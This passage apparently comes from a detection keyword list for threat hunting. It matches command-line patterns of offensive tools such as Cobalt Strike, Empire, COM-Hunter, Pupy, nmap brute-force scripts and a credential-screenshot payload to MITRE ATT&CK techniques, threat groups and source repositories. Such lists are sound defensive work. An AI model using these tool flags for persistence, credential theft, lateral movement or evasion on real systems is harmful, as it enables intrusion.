APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types ps1*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types svc.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types vbs*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* pcanywhere-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* pcworx-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -PE_Clone *,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -* -pe-exp-list *.dll*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -* -PEPath * -ExeArgs *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -PermanentWMI *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* Persist General *.dll*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -* Persist Tasksch *.dll*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -* Persist TreatAs *.dll*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - 
TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -* persist_hkcu_run*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* Persistence.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* -PersistenceScriptName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -PersistentScriptFilePath *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* PEzor.sh *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -pfx *.pfx -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* pgsql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -pi \\\\\\\\.\\\\pipe\\\\*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* Pictures\Screenshots\loot.zip*,offensive_tool_keyword,Harvester_OF_SORROW,The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.,T1056.001 - T1113 - T1512 - T1566.001 - T1059.006,TA0004 - TA0009 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* --pinject *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* -PipeName * -ServiceName * -Command whoami*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,0,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -* pipename_stager *,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -* -pipename_stager *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* pjl-info-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,0,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -* pjl-ready-message.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --plugin KeeFarceRebornPlugin.dll*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* polenum.py*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* pop3-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* pop3-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* pop3-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* popcalc.bin *,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -* popcalc64.bin *,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -* --port 1337*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,0,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -* port-states.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - 